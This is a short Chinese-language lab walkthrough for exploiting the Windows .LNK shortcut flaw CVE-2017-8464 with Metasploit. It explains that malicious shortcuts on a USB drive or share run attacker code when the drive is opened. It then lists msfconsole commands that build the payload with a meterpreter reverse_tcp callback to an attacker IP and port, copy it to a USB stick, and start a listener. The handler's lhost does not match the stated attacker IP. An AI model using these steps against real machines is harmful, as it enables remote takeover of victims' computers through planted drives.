原理:
攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。
当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,
恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。
创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒
注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。
实验环境:同一局域网下进行攻击(公网下攻击正在研究了解后会更新),kali2.0,msfconsole 16
靶机ip 192.168.0.14
攻击机ip 192.168.0.55
过程
1.首先生成u盘攻击文件:
use exploit/windows/fileformat/cve_2017_8464_lnk_rce (使用该漏洞)
set payload windows/x64/meterpreter/reverse_tcp (设置payload以reverse形式的)
set target 1
set lhost 192.168.0.55
set lport 55555
exploit
2.会生成如上的文件将文件考到u盘中
3.接下来进行监听返回的端口
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.14
exploit
4.成功